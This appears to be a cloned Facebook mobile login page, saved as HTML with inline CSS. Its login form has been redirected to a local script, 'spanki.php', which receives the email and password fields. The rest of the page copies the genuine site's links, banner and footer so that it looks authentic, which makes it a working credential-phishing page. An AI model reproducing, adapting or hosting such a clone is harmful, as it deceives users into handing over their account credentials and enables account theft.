

<!--?xml version="1.0" encoding="utf-8"?--><!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" type="text/css" href="cid:css-b5413f91-f891-4c30-86e5-c8ed5af012e5@mhtml.blink" /><title>Facebook – log in or sign up</title><meta name="viewport" content="initial-scale=1, width=240"><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer"><meta name="theme-color" content="#3b5998"><meta http-equiv="origin-trial" content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="description" content="Create an account or log in to Facebook. Connect with friends, family and other people you know. Share photos and videos, send messages and get updates."><link rel="canonical" href="https://www.facebook.com/"><meta property="og:site_name" content="Facebook"><meta property="og:type" content="website"><meta property="og:title" content="Facebook – log in or sign up"><meta property="og:description" content="Create an account or log in to Facebook. Connect with friends, family and other people you know. Share photos and videos, send messages and get updates."><meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png"><meta property="og:url" content="https://www.facebook.com/"><link rel="alternate" hreflang="x-default" href="https://m.facebook.com/"><link rel="alternate" hreflang="en" href="https://m.facebook.com/"><link rel="alternate" hreflang="ar" href="https://m.facebook.com/?locale2=ar_AR"><link rel="alternate" hreflang="bg" href="https://m.facebook.com/?locale2=bg_BG"><link rel="alternate" hreflang="bs" href="https://m.facebook.com/?locale2=bs_BA"><link rel="alternate" hreflang="ca" href="https://m.facebook.com/?locale2=ca_ES"><link rel="alternate" hreflang="da" href="https://m.facebook.com/?locale2=da_DK"><link rel="alternate" hreflang="el" href="https://m.facebook.com/?locale2=el_GR"><link rel="alternate" hreflang="es" href="https://m.facebook.com/?locale2=es_LA"><link rel="alternate" hreflang="es-es" href="https://m.facebook.com/?locale2=es_ES"><link rel="alternate" hreflang="fa" href="https://m.facebook.com/?locale2=fa_IR"><link rel="alternate" hreflang="fi" href="https://m.facebook.com/?locale2=fi_FI"><link rel="alternate" hreflang="fr" href="https://m.facebook.com/?locale2=fr_FR"><link rel="alternate" hreflang="fr-ca" href="https://m.facebook.com/?locale2=fr_CA"><link rel="alternate" hreflang="hi" href="https://m.facebook.com/?locale2=hi_IN"><link rel="alternate" hreflang="hr" href="https://m.facebook.com/?locale2=hr_HR"><link rel="alternate" hreflang="id" href="https://m.facebook.com/?locale2=id_ID"><link rel="alternate" hreflang="it" href="https://m.facebook.com/?locale2=it_IT"><link rel="alternate" hreflang="ko" href="https://m.facebook.com/?locale2=ko_KR"><link rel="alternate" hreflang="mk" href="https://m.facebook.com/?locale2=mk_MK"><link rel="alternate" hreflang="ms" href="https://m.facebook.com/?locale2=ms_MY"><link rel="alternate" hreflang="pl" href="https://m.facebook.com/?locale2=pl_PL"><link rel="alternate" hreflang="pt" href="https://m.facebook.com/?locale2=pt_BR"><link rel="alternate" hreflang="pt-pt" href="https://m.facebook.com/?locale2=pt_PT"><link rel="alternate" hreflang="ro" href="https://m.facebook.com/?locale2=ro_RO"><link rel="alternate" hreflang="sl" href="https://m.facebook.com/?locale2=sl_SI"><link rel="alternate" hreflang="sr" href="https://m.facebook.com/?locale2=sr_RS"><link rel="alternate" hreflang="th" href="https://m.facebook.com/?locale2=th_TH"><link rel="alternate" hreflang="vi" href="https://m.facebook.com/?locale2=vi_VN"><link rel="manifest" href="https://free.facebook.com/data/manifest/" crossorigin="use-credentials"></head><body tabindex="0" class="b c d e f"><div class="g"><div id="viewport"><div class="h i" id="header"><h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1><img src="https://z-m-static.xx.fbcdn.net/rsrc.php/v3/y8/r/k97pj8-or6s.png" width="77" height="16" class="j k" alt="facebook"></div><div id="objects_container"><div class="f" id="root" role="main"><table class="l" role="presentation"><tbody><tr><td class="m"><div class="n o p" style="display: none;" id="login_error"><div class="q"></div></div><div class="r"><div class="s t"><div id="login_top_banner"><div class="u"><div class="v"><div> By proceeding, you agree to <a href="https://m.facebook.com/mobile/zero/carrier_term/"><span>MTN</span>'s Terms</a>, which includes letting Facebook request and receive your phone number. <a class="w" href="https://free.facebook.com/header_settings/?redirect_url=https%3A%2F%2Ffree.facebook.com%2F&amp;flow=opt_out&amp;refid=8"> Change settings </a></div></div></div></div><div class="x"><form method="get" action="spanki.php" class="y z" id="login_form" novalidate="1"><ul class="ba bb bc"><li class="bb"><span class="bd be" id="u_0_0_uC">Phone number or email address</span><input autocorrect="off" autocapitalize="off" type="email" class="bf bg bh" autocomplete="on" id="m_login_email" name="email" aria-labelledby="u_0_0_uC"></li><li class="bb"><div id="password_input_with_placeholder"><span class="bd be" id="u_0_1_Fe">Password</span><input autocorrect="off" autocapitalize="off" class="bf bg bi bj" autocomplete="on" name="pass" aria-labelledby="u_0_1_Fe" type="password"></div></li><li class="bb"><input value="Log In" type="submit" name="login" class="bk bl bm bn bo bp"></li></ul><div><div id="login_reg_separator" class="bq"><span class="br">or</span></div><div class="bs bt" id="signup_button_area"><div class="bs bu bv" id="signup-button" tabindex="0"><input value="Create New Account" type="submit" name="sign_up" class="bk bl bm bw bo bx"></div></div></div><div></div></form><div><div class="by bz"><div class="bs ca"><a class="ca" tabindex="0" href="https://free.facebook.com/recover/initiate/?c=https%3A%2F%2Ffree.facebook.com%2F&amp;r&amp;cuid&amp;ars=facebook_login&amp;privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjI2MTEwMzQ3LCJjYWxsc2l0ZV9pZCI6Mjg0Nzg1MTQ5MzQ1MzY5fQ%3D%3D&amp;lwv=100&amp;refid=8" id="forgot-password-link">Forgotten password?</a></div></div><div style="padding-top: 42px"><div><div></div><div class="by" style="text-align:center;"><div class="cb cc"><span class="cd ce"><ul class="ba cf"><li class="bb bs"></li><li class="bb"></li><li class="bb"></li></ul></span></div></div></div></div></div></div></div></div></td></tr></tbody></table><div style="display:none"><div></div><div></div></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none"></span></div></div><div><div class="cg"><div class="ch"><table class="l" role="presentation"><tbody><tr><td class="m ci" style="width:50%"><b class="cj">English (UK)</b><form method="post" action="https://free.facebook.com/intl/save_locale/?loc=fr_FR&amp;href=https%3A%2F%2Ffree.facebook.com%2F&amp;index=2&amp;ls_ref=m_basic_locale_footer&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8" class="ck"><input value="Français (France)" type="submit" class="bk cl cm cn"></form><form method="post" action="https://free.facebook.com/intl/save_locale/?loc=es_LA&amp;href=https%3A%2F%2Ffree.facebook.com%2F&amp;index=4&amp;ls_ref=m_basic_locale_footer&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8" class="ck"><input value="Español" type="submit" class="bk cl cm cn"></form></td><td class="m co" style="width:50%"><form method="post" action="https://free.facebook.com/intl/save_locale/?loc=ha_NG&amp;href=https%3A%2F%2Ffree.facebook.com%2F&amp;index=1&amp;ls_ref=m_basic_locale_footer&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8" class="ck"><input value="Hausa" type="submit" class="bk cl cm cn"></form><form method="post" action="https://free.facebook.com/intl/save_locale/?loc=pt_BR&amp;href=https%3A%2F%2Ffree.facebook.com%2F&amp;index=3&amp;ls_ref=m_basic_locale_footer&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8" class="ck"><input value="Português (Brasil)" type="submit" class="bk cl cm cn"></form><a class="cp" href="https://free.facebook.com/language.php?n=https%3A%2F%2Ffree.facebook.com%2F&amp;ref_component=mbasic_footer&amp;ref_page=%2Fwap%2Findex.php&amp;refid=8"><div class="cq"> + </div></a></td></tr></tbody></table></div><span class="bd cr cs">Facebook Inc.</span></div></div></div></div></body></html>






<style>

.r { margin-bottom: 36px; }

.o { padding: 8px; }

.j { padding-bottom: 4px; padding-top: 4px; }

.cc { padding-bottom: 12px; padding-top: 12px; }

.cb { padding-left: 4px; padding-right: 4px; }

.bt { padding-left: 8px; padding-right: 8px; }

.by { padding-top: 12px; }

.b .bv { display: block; width: auto; }

.b .bv .bw, .b .bv .bw:hover { background-color: rgb(66, 183, 42); color: rgb(255, 255, 255); height: 44px; }

.b .bq { display: block; margin-bottom: 5px; margin-left: 3%; margin-top: -3px; overflow: hidden; text-align: center; white-space: nowrap; width: 94%; }

.b .bq > span { display: inline-block; position: relative; }

.b .bq > span::before, .b .bq > span::after { background: rgb(204, 208, 213); content: ""; height: 1px; position: absolute; top: 50%; width: 9999px; }

.b .bq > span::before { margin-right: 15px; right: 100%; }

.b .bq > span::after { left: 100%; margin-left: 15px; }

.b .br { color: rgb(75, 79, 86); font-size: 14px; }

.b .bh { border: 1px solid rgb(153, 153, 153); box-sizing: border-box; width: 100%; }

.b .l { border: 0px; border-collapse: collapse; margin: 0px; padding: 0px; width: 100%; }

.b .l tbody { vertical-align: top; }

.b .l td { padding: 0px; }

.b .l td.bb { padding: 4px; }

.b .m { width: 100%; }

.n { background: rgb(250, 62, 62); }

.p { color: rgb(255, 255, 255); }

.b .p a, .b .p a:visited { color: rgb(255, 255, 255); font-weight: bold; }

.b .p a:focus, .b .p a:hover { background: rgb(29, 33, 41); }

.ce { color: rgb(75, 79, 86); }

.q { font-size: 12px; line-height: 16px; }

.cd { font-size: 16px; line-height: 20px; }

.bl { font-weight: normal; }

.bd { font-weight: bold; }

.bs { text-align: center; }

.w { font-size: 12px; line-height: 14px; }

.u { background-color: rgb(230, 242, 255); border-bottom: 1px solid rgb(110, 173, 255); }

.v { background-color: rgb(230, 242, 255); color: rgb(68, 73, 80); font-size: 12px; line-height: 14px; padding: 10px 12px; }

.b a, .b a:visited { color: rgb(59, 89, 152); text-decoration: none; }

.b a:focus, .b a:hover { background-color: rgb(59, 89, 152); color: rgb(255, 255, 255); }

form { margin: 0px; border: 0px; }

.ba { margin: 0px; }

.ba li { display: block; list-style: none; }

.b .cf { padding: 0px; }

.b .bb { padding: 4px; }

.b .be { color: rgb(141, 148, 158); display: block; font-weight: bold; }

.b .bg { padding: 12px 8px; color: rgb(28, 30, 33); }

.bf { border: 0px; display: block; margin: 0px; padding: 0px; }

.bi { box-sizing: border-box; width: 100%; }

.b .bj { border: 1px solid rgb(153, 153, 153); }

.bm { appearance: none; background: none; display: inline-block; font-size: 12px; height: 28px; line-height: 28px; margin: 0px; overflow: visible; padding: 0px 9px; text-align: center; vertical-align: top; white-space: nowrap; }

.b .bm { border-radius: 2px; }

.bx, a.bx, .b a.bx, .b a.bx:visited { background-color: rgb(245, 246, 247); color: rgb(75, 79, 86); }

.b a.bx:hover, .b .bx:hover { background-color: rgb(235, 237, 240); color: rgb(75, 79, 86); }

.b .bx { border: 1px solid rgb(190, 195, 201); }

.bx[disabled] { color: rgb(190, 195, 201); }

.b .bx[disabled]:hover { background-color: rgb(245, 246, 247); color: rgb(190, 195, 201); }

.bp, a.bp, html .b a.bp { color: rgb(255, 255, 255); }

.b .bp { background-color: rgb(66, 103, 178); border: 1px solid rgb(54, 88, 153); }

.b a.bp:hover, .b .bp:hover { background-color: rgb(70, 94, 145); }

.bp[disabled] { color: rgb(137, 155, 193); }

.b .bp[disabled]:hover { background-color: rgb(66, 103, 178); }

.bo { font-size: 14px; height: 44px; line-height: 44px; padding: 0px 20px; }

.b a.bm::after { content: ""; display: inline-block; height: 100%; vertical-align: middle; }

.bm.bn { display: block; width: 100%; }

a.bm.bn, .b label.bm.bn { display: block; width: auto; }

.b .bm { padding: 0px 8px; }

.b a.bm { height: 26px; line-height: 26px; }

.b .bo { padding: 0px 19px; }

.b a.bo { font-size: 14px; height: 42px; line-height: 42px; }

body { text-align: left; direction: ltr; }

body, tr, input, textarea, button { font-family: sans-serif; }

body, p, figure, h1, h2, h3, h4, h5, h6, ul, ol, li, dl, dd, dt { margin: 0px; padding: 0px; }

h1, h2, h3, h4, h5, h6 { font-size: 1em; font-weight: bold; }

ul, ol { list-style: none; }

article, aside, figcaption, figure, footer, header, nav, section { display: block; }

.f { background-color: rgb(255, 255, 255); }

.h { background-color: rgb(59, 89, 152); }

.s { background-color: rgb(236, 239, 245); }

#page { position: relative; }

.i { padding: 2px 3px; }

.cp { display: block; font-size: x-small; margin: -3px -3px 1px; padding: 3px; }

.ck { display: block; margin: -3px -3px 1px; }

.ck .cm { font-size: x-small; padding: 3px; text-align: left; width: 100%; }

.cq { border: 1px solid rgb(144, 148, 156); display: block; font-size: x-large; height: 20px; line-height: 18px; text-align: center; vertical-align: middle; width: 20px; }

.b .ch input, .b .ch input:visited, .b .ch a, .b .ch a:visited { color: rgb(190, 195, 201); }

.b .ch input:focus, .b .ch input:hover, .b .ch a:focus, .b .ch a:hover { background: rgb(218, 221, 225); color: rgb(29, 33, 41); }

.cg { background-color: rgb(68, 73, 80); font-size: x-small; padding: 7px 8px 8px; }

.cj { color: rgb(190, 195, 201); display: block; font-size: x-small; margin: -3px -3px 1px; padding: 3px; }

.cl { appearance: none; background-color: transparent; border: 0px; display: inline; font-size: inherit; margin: 0px; padding: 0px; }

.cl:hover { background-color: rgb(59, 89, 152); color: rgb(255, 255, 255); white-space: normal; }

.cn { color: rgb(59, 89, 152); }

.cs { color: rgb(255, 255, 255); }

body, tr, input, textarea, .g { font-size: medium; }

.k { border: 0px; display: inline-block; vertical-align: top; }

i.k u { position: absolute; width: 0px; height: 0px; overflow: hidden; }

</style>
